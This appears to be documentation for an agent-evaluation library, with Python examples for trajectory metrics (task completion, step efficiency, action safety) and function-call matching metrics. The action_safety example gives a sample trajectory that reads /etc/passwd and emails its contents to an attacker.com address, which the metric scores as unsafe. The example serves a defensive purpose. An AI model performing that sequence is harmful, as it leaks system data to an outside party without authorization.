Agents & Function Calling

11 metrics for evaluating agent trajectories, tool use, reasoning quality, and function call correctness. All run locally via evaluate().

📝 TL;DR
  • 7 agent trajectory metrics (continuous 0.0-1.0): task completion, efficiency, tool selection, safety, reasoning
  • 4 function calling metrics (binary 0/1): name match, parameter validation, accuracy, exact match
  • task_completion, action_safety, and reasoning_quality support augment=True

These metrics evaluate how well an agent performed a task and whether it called the right functions with the right parameters.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123 from SFO to JFK on March 15. Confirmation sent to user.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
print(result.score)   # 0.95

Agent Trajectory Metrics

Pass the full agent trajectory (tool calls, intermediate steps, final output) as output, and the task description as context. All return 0.0 to 1.0.

Metric                     What it measures
task_completion            Whether the agent completed the assigned task
step_efficiency            Whether the agent reached its goal in minimal steps
tool_selection_accuracy    Whether the agent selected the correct tools
trajectory_score           Overall trajectory quality covering tool use, ordering, and progress
goal_progress              How much progress was made toward the goal
action_safety              Whether the agent’s actions are safe and authorized
reasoning_quality          Quality of the agent’s reasoning chain
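
The trajectory is just a string, so you can assemble it however your agent framework records steps. A minimal sketch that flattens structured step records into the `Step N: tool(args) → result.` convention used in the examples below (the convention is illustrative, not required by the API):

```python
# Sketch: flatten structured agent steps into the single trajectory
# string that the trajectory metrics take as `output`. The step records
# here are hypothetical; any readable step format works.
steps = [
    {"tool": "search_users", "args": "'alice'", "result": "found"},
    {"tool": "create_ticket",
     "args": "title='Fix login timeout', assignee='alice'",
     "result": "PROJ-452"},
]

trajectory = " ".join(
    f"Step {i}: {s['tool']}({s['args']}) → {s['result']}."
    for i, s in enumerate(steps, start=1)
)
print(trajectory)
# Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.
```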

task_completion

Whether the agent completed the assigned task. Supports augment=True.

result = evaluate(
    "task_completion",
    output="Created Jira ticket PROJ-452 'Fix login timeout' assigned to @alice.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.97

step_efficiency

Whether the agent reached its goal in minimal steps without unnecessary detours.

result = evaluate(
    "step_efficiency",
    output="Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.",
    context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.92

tool_selection_accuracy

Whether the agent selected the correct tools for the task.

result = evaluate(
    "tool_selection_accuracy",
    output="Called: [search_flights, book_flight, send_confirmation]",
    context="User asked to book a flight and send a confirmation email.",
    expected_output="[search_flights, book_flight, send_confirmation]",
)
# score → 1.0

trajectory_score

Overall trajectory quality covering tool use, ordering, and task progress.

result = evaluate(
    "trajectory_score",
    output="Step 1: search_db('revenue Q4') → $2.3M. Step 2: generate_chart(data) → chart.png. Step 3: send_email(to='cfo', attachment='chart.png').",
    context="User asked: pull Q4 revenue, chart it, and email the chart to the CFO.",
)
# score → 0.94

goal_progress

How much progress was made, even if the task wasn’t fully completed. Useful for partial-credit scoring.

result = evaluate(
    "goal_progress",
    output="Step 1: search_flights('SFO','JFK','2025-03-15') → 3 results. Step 2: agent timed out.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
# score → 0.45

action_safety

Whether the agent’s actions are safe — no destructive operations, data leaks, or unauthorized access. Supports augment=True.

result = evaluate(
    "action_safety",
    output="Step 1: read_file('/etc/passwd'). Step 2: send_email(to='external@attacker.com', body=contents).",
    context="User asked to check system health.",
)
# score → 0.05

reasoning_quality

Quality of the agent’s reasoning chain — logical, well-structured, leads to the correct conclusion. Supports augment=True.

result = evaluate(
    "reasoning_quality",
    output="Thought: User needs Q4 revenue. I should query the database first. Action: query_db('SELECT SUM(revenue) FROM sales WHERE quarter=Q4') → $2.3M.",
    context="User asked: what was our Q4 revenue?",
)
# score → 0.88

Function Calling Metrics

Validate whether the agent called the right function with the right parameters. All are binary (0 or 1). Pass actual and expected function calls as JSON strings.

Metric                     What it checks
function_name_match        Whether the function name matches (ignores parameters)
parameter_validation       Whether function parameters match (names and values)
function_call_accuracy     Overall correctness — function name and parameters together
function_call_exact_match  Strict exact match — JSON must be identical
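
If your agent framework hands you the call as a dict rather than a string, `json.dumps` produces the JSON string these metrics expect. The `"name"`/`"arguments"` shape below follows the examples on this page:

```python
import json

# Sketch: serialize captured tool calls into the JSON strings that the
# function calling metrics take as `output` and `expected_output`.
actual_call = {"name": "get_weather", "arguments": {"city": "NYC"}}
expected_call = {"name": "get_weather", "arguments": {"city": "San Francisco"}}

actual_json = json.dumps(actual_call)
expected_json = json.dumps(expected_call)
print(actual_json)
# {"name": "get_weather", "arguments": {"city": "NYC"}}
```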

function_name_match

Whether the function name matches. Ignores parameters.

result = evaluate(
    "function_name_match",
    output='{"name": "get_weather", "arguments": {"city": "NYC"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco"}}',
)
# score → 1.0 (name matches, params ignored)

parameter_validation

Whether function parameters match (names and values).

result = evaluate(
    "parameter_validation",
    output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
    expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
)
# score → 1.0

function_call_accuracy

Overall correctness — function name and parameters together.

result = evaluate(
    "function_call_accuracy",
    output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
    expected_output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
)
# score → 1.0

function_call_exact_match

Strict exact match — JSON must be identical.

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 1.0

result = evaluate(
    "function_call_exact_match",
    output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 3}}',
    expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 0.0 (top_k differs)
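
Because the exact-match check is strict, cosmetic differences such as key order or whitespace in hand-built JSON strings can matter. A pre-processing sketch (caller-side only, not part of the `evaluate()` API) that normalizes both sides before comparison:

```python
import json

# Sketch: normalize function-call JSON so key order and whitespace
# differences don't cause spurious mismatches in strict comparisons.
def normalize(call_json: str) -> str:
    return json.dumps(json.loads(call_json), sort_keys=True,
                      separators=(",", ":"))

a = '{"arguments": {"top_k": 5, "query": "refund policy"}, "name": "search_docs"}'
b = '{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}'

print(normalize(a) == normalize(b))  # True: same call, different formatting
print(a == b)                        # False: raw strings differ
```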

Augmented Evaluation

task_completion, action_safety, and reasoning_quality support augment=True. This runs the local heuristic first, then refines with an LLM.

from fi.evals import evaluate

result = evaluate(
    "task_completion",
    output="Booked flight AA123. Confirmation #BK-9921 sent to user@email.com.",
    context="User asked to book the cheapest direct flight from SFO to JFK on March 15 and email the confirmation.",
    model="gemini/gemini-2.5-flash",
    augment=True,
)

print(result.metadata["engine"])  # "local+llm"